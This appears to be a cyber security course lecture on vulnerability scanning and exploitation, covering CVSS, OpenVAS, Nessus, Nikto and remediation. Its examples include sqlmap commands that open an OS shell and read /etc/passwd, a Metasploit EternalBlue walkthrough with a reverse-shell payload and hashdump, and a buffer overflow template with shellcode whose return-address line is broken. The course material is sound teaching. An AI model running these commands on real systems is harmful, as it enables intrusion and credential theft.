Skip to main content
Milav
  1. Resources/
  2. Study Materials/
  3. Information & Communication Technology Engineering/
  4. ICT Semester 5/
  5. Cyber Security (4353204)/

8 mins· ·
Milav Dabgar
Author
Milav Dabgar
Experienced lecturer in the electrical and electronic manufacturing industry. Skilled in Embedded Systems, Image Processing, Data Science, MATLAB, Python, STM32. Strong education professional with a Master’s degree in Communication Systems Engineering from L.D. College of Engineering - Ahmedabad.
Vulnerability Scanning and Exploitation

Vulnerability Scanning and Exploitation

Identifying and Exploiting System Weaknesses

Comprehensive Security Assessment and Penetration Testing

Port Scanning in Ethical Hacking

Vulnerability Assessment Overview

Vulnerability Assessment: The systematic identification, analysis, and evaluation of security weaknesses in systems, networks, and applications to determine potential attack vectors and security risks.

Core Components:

  • Discovery: Identifying systems, services, and applications
  • Scanning: Automated vulnerability detection
  • Analysis: Evaluating vulnerability severity and impact
  • Prioritization: Risk-based vulnerability ranking
  • Reporting: Comprehensive findings documentation
  • Remediation: Providing fix recommendations
Purpose: Enable organizations to proactively identify and address security weaknesses before they can be exploited by attackers

Vulnerability vs Exploit

Vulnerability:

  • Definition: A weakness or flaw in a system
  • Nature: Passive security gap
  • Examples: Missing patches, misconfigurations
  • Discovery: Through scanning and analysis
  • Risk: Potential for compromise
  • Action: Requires identification and remediation

Exploit:

  • Definition: Code or technique that leverages vulnerability
  • Nature: Active attack mechanism
  • Examples: Malware, attack scripts, techniques
  • Discovery: Through research and development
  • Risk: Actual compromise execution
  • Action: Used to gain unauthorized access
Relationship Example:
Vulnerability: Unpatched Apache Struts framework (CVE-2017-5638)
Exploit: Malicious HTTP request exploiting deserialization flaw
Impact: Remote code execution on vulnerable web application

Vulnerability Types and Classifications

Software Vulnerabilities:

  • Buffer overflow attacks
  • SQL injection flaws
  • Cross-site scripting (XSS)
  • Authentication bypass
  • Privilege escalation
  • Input validation errors

Network Vulnerabilities:

  • Open ports and services
  • Protocol weaknesses
  • Default credentials
  • Weak encryption
  • Network misconfigurations
  • Unsecured communications

System Vulnerabilities:

  • Missing security patches
  • Weak access controls
  • System misconfigurations
  • Kernel vulnerabilities
  • Service account issues
  • File system permissions

Severity Classifications:

  • Critical (9.0-10.0): Immediate exploitation risk, system compromise
  • High (7.0-8.9): Significant risk, potential for major impact
  • Medium (4.0-6.9): Moderate risk, limited impact
  • Low (0.1-3.9): Minor risk, minimal impact
  • Informational (0.0): No direct security impact

Common Vulnerability Scoring System (CVSS)

CVSS: Industry standard framework for rating the severity of security vulnerabilities, providing quantitative severity scores from 0.0 to 10.0.

Base Metrics:

  • Attack Vector (AV): Network, Adjacent, Local, Physical
  • Attack Complexity (AC): Low, High
  • Privileges Required (PR): None, Low, High
  • User Interaction (UI): None, Required
  • Scope (S): Unchanged, Changed
  • Impact: Confidentiality, Integrity, Availability

Temporal and Environmental:

  • Exploit Code Maturity: Proof-of-concept availability
  • Remediation Level: Patch availability
  • Report Confidence: Verification level
  • Modified Base Metrics: Environment-specific adjustments
  • Collateral Damage: Secondary impact
  • Target Distribution: System prevalence
CVSS Score Example:
CVE-2017-0144 (EternalBlue/WannaCry)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Score: 9.3 (Critical)
Vector: Network accessible, Low complexity, No privileges required

Vulnerability Scanning Process

Systematic Approach: Vulnerability scanning follows a structured methodology to ensure comprehensive coverage and accurate results.
Scanning Workflow:

1. Planning and Preparation:
• Define scope and objectives
• Identify target systems and networks
• Obtain necessary authorizations
• Select appropriate scanning tools
• Schedule scanning activities

2. Discovery and Asset Identification:
• Network discovery and host enumeration
• Port scanning and service detection
• Operating system fingerprinting
• Application and service version identification
• Asset inventory creation

3. Vulnerability Detection:
• Automated vulnerability scanning
• Signature-based detection
• Behavioral analysis
• Configuration assessment
• Patch level verification

4. Analysis and Validation:
• False positive elimination
• Vulnerability verification
• Risk assessment and prioritization
• Impact analysis
• Exploitability evaluation

5. Reporting and Remediation:
• Comprehensive vulnerability reports
• Risk-based prioritization
• Remediation recommendations
• Executive and technical summaries
• Tracking and follow-up procedures

Vulnerability Scanning Tools

Commercial Scanners:

  • Nessus: Comprehensive vulnerability scanner
  • Qualys VMDR: Cloud-based vulnerability management
  • Rapid7 Nexpose: Vulnerability risk management
  • IBM Security AppScan: Application security testing
  • Veracode: Application security platform

Open Source Tools:

  • OpenVAS: Full-featured vulnerability scanner
  • Nikto: Web server security scanner
  • OWASP ZAP: Web application security testing
  • Nuclei: Fast and customizable scanner
  • Lynis: Security auditing and compliance

Specialized Scanners:

  • Nmap: Network discovery and security auditing
  • SQLmap: SQL injection detection and exploitation
  • Burp Suite: Web application security testing
  • Metasploit: Penetration testing framework
  • Acunetix: Web application vulnerability scanner

Tool Selection Criteria:

  • Scope Coverage: Network, web, database, mobile capabilities
  • Accuracy: Low false positive rates
  • Performance: Scanning speed and resource efficiency
  • Reporting: Comprehensive and actionable reports
  • Integration: API and third-party tool compatibility
  • Cost: Licensing and operational expenses

OpenVAS Configuration and Usage

OpenVAS: Open source vulnerability assessment system providing comprehensive vulnerability testing and management capabilities.
OpenVAS Installation and Setup:

# Install OpenVAS on Kali Linux
sudo apt update
sudo apt install openvas

# Setup and configure OpenVAS
sudo gvm-setup
sudo gvm-check-setup

# Start OpenVAS services
sudo gvm-start

# Access web interface
https://localhost:9392

# Create scan target
• Navigate to Configuration → Targets
• Click "New Target" icon
• Enter target name and hosts
• Configure credentials if needed

# Create and run scan
• Go to Scans → Tasks
• Click "New Task" icon
• Select scan config and target
• Start the scan task

# Review results
• Monitor scan progress
• View detailed vulnerability reports
• Export reports in various formats
• Generate executive summaries

Nessus Professional Scanning

Nessus: Industry-leading vulnerability scanner with extensive plugin library and advanced scanning capabilities.
Nessus Setup and Scanning:

# Download and install Nessus
wget https://www.tenable.com/downloads/nessus
sudo dpkg -i Nessus-x.x.x-debian6_amd64.deb

# Start Nessus service
sudo systemctl enable nessusd
sudo systemctl start nessusd

# Access web interface
https://localhost:8834

# Create new scan
• Select scan template (Basic Network Scan, Web Application Tests)
• Configure scan settings and targets
• Set credentials for authenticated scanning
• Schedule or launch scan immediately

# Advanced scan configurations
• Custom scan policies
• Plugin family selection
• Performance tuning
• Compliance auditing
• Credentialed vs. non-credentialed scans

# Results analysis
• Vulnerability severity distribution
• Host-based vulnerability details
• Plugin output and solutions
• Executive dashboard reports
• Remediation project creation

Web Application Vulnerability Scanning

Web App Security: Specialized scanning techniques for identifying vulnerabilities in web applications and services.

OWASP ZAP Usage:

  • Proxy Setup: Configure browser proxy
  • Spider/Crawl: Discover application structure
  • Active Scan: Automated vulnerability detection
  • Manual Testing: Interactive security testing
  • API Testing: REST/SOAP service scanning
  • Authentication: Session-based testing

Nikto Web Scanner:

  • Server Scanning: Web server vulnerability detection
  • CGI Scanning: Common Gateway Interface testing
  • SSL Testing: Certificate and configuration analysis
  • Database: Comprehensive vulnerability database
  • Reporting: Multiple output formats
  • Plugins: Extensible test framework
Web Application Scanning Commands:

# Nikto web server scanning
nikto -h http://target.com
nikto -h https://target.com -ssl -port 443
nikto -h target.com -output report.html -Format htm

# OWASP ZAP automated scanning
zap-baseline.py -t http://target.com
zap-full-scan.py -t http://target.com

# Dirb directory enumeration
dirb http://target.com
dirb http://target.com /usr/share/wordlists/dirb/big.txt

# Gobuster directory brute forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt

Database Vulnerability Assessment

Database Security: Specialized techniques for identifying vulnerabilities in database systems and configurations.

Database Scanners:

  • SQLmap: SQL injection detection and exploitation
  • NoSQLMap: NoSQL injection testing
  • Oscanner: Oracle database assessment
  • BBQSQL: Blind SQL injection framework
  • jSQL Injection: Java-based SQL injection tool

Database Vulnerabilities:

  • SQL injection vulnerabilities
  • Default or weak passwords
  • Missing security patches
  • Excessive user privileges
  • Unencrypted data transmission
  • Weak authentication mechanisms

Testing Techniques:

  • Automated injection testing
  • Authentication bypass attempts
  • Privilege escalation testing
  • Data extraction verification
  • Configuration assessment
  • Access control validation
SQLmap Usage Examples:

# Basic SQL injection testing
sqlmap -u "http://target.com/page.php?id=1"

# POST request testing
sqlmap -r request.txt --batch

# Database enumeration
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database --tables
sqlmap -u "http://target.com/page.php?id=1" -D database -T table --dump

# Advanced techniques
sqlmap -u "http://target.com/page.php?id=1" --os-shell
sqlmap -u "http://target.com/page.php?id=1" --file-read=/etc/passwd

Vulnerability Exploitation Process

Exploitation: The process of leveraging identified vulnerabilities to gain unauthorized access or demonstrate security impact.
Exploitation Methodology:

1. Vulnerability Verification:
• Confirm vulnerability existence
• Validate scanner findings
• Eliminate false positives
• Assess exploitability

2. Exploit Research and Development:
• Search for existing exploits
• Analyze vulnerability details
• Develop proof-of-concept code
• Test exploit reliability

3. Exploit Execution:
• Prepare target environment
• Execute exploit payload
• Verify successful exploitation
• Document exploitation process

4. Post-Exploitation Activities:
• Establish persistent access
• Escalate privileges
• Gather evidence of compromise
• Assess lateral movement opportunities

5. Impact Documentation:
• Capture exploitation evidence
• Document business impact
• Create remediation timeline
• Prepare executive briefing

Metasploit Exploitation Framework

Metasploit: Comprehensive penetration testing platform providing exploit development, execution, and post-exploitation capabilities.
Metasploit Exploitation Workflow:

# Start Metasploit console
msfconsole

# Search for exploits
msf6 > search cve:2017-0144
msf6 > search type:exploit platform:windows smb

# Select and configure exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100

# Configure payload
msf6 exploit(ms17_010_eternalblue) > show payloads
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444

# Execute exploit
msf6 exploit(ms17_010_eternalblue) > check
msf6 exploit(ms17_010_eternalblue) > exploit

# Post-exploitation commands
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump
meterpreter > screenshot
meterpreter > shell

Manual Exploitation Techniques

Buffer Overflow Exploitation:

  • Vulnerability Analysis: Identify buffer overflow conditions
  • Fuzzing: Generate malicious input patterns
  • Offset Calculation: Determine EIP overwrite point
  • Shellcode Development: Create payload execution code
  • Exploit Chaining: Bypass modern protections

Web Exploitation:

  • SQL Injection: Database query manipulation
  • XSS Exploitation: Client-side code injection
  • CSRF Attacks: Cross-site request forgery
  • File Upload: Malicious file execution
  • Authentication Bypass: Login mechanism circumvention

Network Service Exploitation:

  • Service Enumeration: Detailed service fingerprinting
  • Protocol Attacks: Network protocol vulnerabilities
  • Default Credentials: Weak authentication exploitation
  • Service Exploits: Application-specific vulnerabilities
  • Privilege Escalation: Local and remote privilege elevation
  • Lateral Movement: Network propagation techniques

Exploit Development Fundamentals

Exploit Development: The process of creating reliable code that leverages vulnerabilities to achieve specific security objectives.

Development Tools:

  • Debuggers: GDB, WinDbg, Immunity
  • Disassemblers: IDA Pro, Ghidra, Radare2
  • Fuzzers: AFL, Peach, Spike
  • Hex Editors: HxD, Bless, xxd
  • Compilers: GCC, MSVC, NASM

Exploit Components:

  • Trigger: Vulnerability activation code
  • Payload: Code executed after exploitation
  • NOP Sled: Instruction padding for reliability
  • Return Address: Control flow redirection
  • Shellcode: Assembly payload instructions

Protection Bypasses:

  • ASLR: Address Space Layout Randomization
  • DEP/NX: Data Execution Prevention
  • Stack Canaries: Stack overflow protection
  • Control Flow Integrity: CFI bypasses
  • SMEP/SMAP: Kernel protection mechanisms
Basic Buffer Overflow Exploit Structure:

#!/usr/bin/python3
import struct

# Buffer overflow exploit template
buffer_size = 1024
offset = 268 # EIP overwrite offset

# Shellcode (example: reverse shell)
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
b"\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80")

# Return address (JMP ESP or RET instruction)
ret_addr = struct.pack("
# Construct exploit payload
padding = b"A" * (offset - len(shellcode))
exploit = padding + shellcode + ret_addr

print(f"Exploit payload length: {len(exploit)}")

Post-Exploitation Activities

Post-Exploitation: Activities performed after successful exploitation to maximize impact assessment and demonstrate security risks.

Information Gathering:

  • System Information: OS, architecture, patches
  • User Accounts: Local and domain users
  • Network Configuration: Interfaces, routes, services
  • Installed Software: Applications and versions
  • Running Processes: Active services and applications
  • File System: Sensitive files and directories

Privilege Escalation:

  • Local Exploits: Kernel and application vulnerabilities
  • Misconfiguration: Weak file permissions
  • Service Accounts: High-privilege service abuse
  • Scheduled Tasks: Task hijacking techniques
  • Registry Manipulation: Windows registry abuse
  • Sudo/SUID: Unix privilege escalation

Persistence and Lateral Movement:

  • Backdoor Installation: Persistent access mechanisms
  • Credential Harvesting: Password and hash collection
  • Network Pivoting: Internal network exploration
  • Lateral Movement: Spreading to additional systems
  • Data Exfiltration: Sensitive information extraction
  • Covert Channels: Stealthy communication methods

Vulnerability Management Lifecycle

Continuous Process: Vulnerability management is an ongoing cycle of identification, assessment, remediation, and verification.
VM Lifecycle Phases:

1. Asset Discovery and Inventory:
• Network asset identification
• Service and application mapping
• Asset categorization and prioritization
• Inventory database maintenance

2. Vulnerability Assessment:
• Regular automated scanning
• Manual security testing
• Threat intelligence integration
• Risk-based vulnerability scoring

3. Risk Analysis and Prioritization:
• Business impact assessment
• Exploitability evaluation
• Asset criticality weighting
• Remediation timeline planning

4. Remediation and Mitigation:
• Patch management deployment
• Configuration hardening
• Compensating controls implementation
• Emergency response procedures

5. Verification and Reporting:
• Remediation validation scanning
• Risk reduction measurement
• Executive reporting and dashboards
• Compliance verification

6. Continuous Monitoring:
• Real-time vulnerability detection
• Threat landscape monitoring
• Process improvement
• Lessons learned integration

Vulnerability Remediation Strategies

Elimination:

  • Apply security patches
  • Update software versions
  • Remove vulnerable services
  • Disable unused features
  • Replace vulnerable systems
  • Code fixes for custom applications

Mitigation:

  • Network segmentation
  • Access control restrictions
  • Web Application Firewalls (WAF)
  • Intrusion Prevention Systems
  • Configuration hardening
  • Monitoring and alerting

Acceptance:

  • Business risk acceptance
  • Cost-benefit analysis
  • Compensating controls
  • Insurance coverage
  • Regular reassessment
  • Incident response preparation

Prioritization Framework:

  • Critical Assets First: Protect high-value systems
  • Exploit Availability: Address publicly available exploits
  • CVSS Scores: Focus on high-severity vulnerabilities
  • Attack Surface: Prioritize external-facing systems
  • Business Impact: Consider operational dependencies
  • Compliance Requirements: Meet regulatory obligations

Legal and Ethical Considerations

Responsible Testing: Vulnerability scanning and exploitation must be conducted within legal and ethical boundaries with proper authorization.

Legal Requirements:

  • Written Authorization: Explicit permission from system owners
  • Scope Definition: Clear testing boundaries and limitations
  • Data Protection: Privacy and confidentiality safeguards
  • Incident Procedures: Emergency response protocols
  • Evidence Handling: Proper documentation and chain of custody

Ethical Guidelines:

  • Minimal Impact: Avoid system damage or disruption
  • Responsible Disclosure: Timely vulnerability reporting
  • Professional Conduct: Industry standards compliance
  • Confidentiality: Protect sensitive information
  • Continuous Education: Stay current with best practices

Best Practices:

  • Staging Environments: Test in non-production systems when possible
  • Time Windows: Schedule testing during maintenance windows
  • Communication: Maintain regular stakeholder updates
  • Documentation: Keep detailed records of all activities
  • Professional Insurance: Maintain liability coverage
  • Regulatory Compliance: Adhere to industry-specific requirements

Key Takeaways

  • Vulnerability assessment is a systematic process requiring proper tools and methodology
  • CVSS scoring provides standardized vulnerability severity assessment
  • Multiple scanning tools are needed for comprehensive vulnerability coverage
  • Manual validation is essential to eliminate false positives
  • Exploitation demonstrates real-world impact and risk
  • Post-exploitation activities reveal full security impact
  • Vulnerability management is an ongoing lifecycle process
  • Legal authorization and ethical guidelines must always be followed
Remember: Vulnerability scanning and exploitation are powerful techniques that must be used responsibly with proper authorization to improve organizational security

Thank You

Questions & Discussion

Next: Types of Attacks and Attackers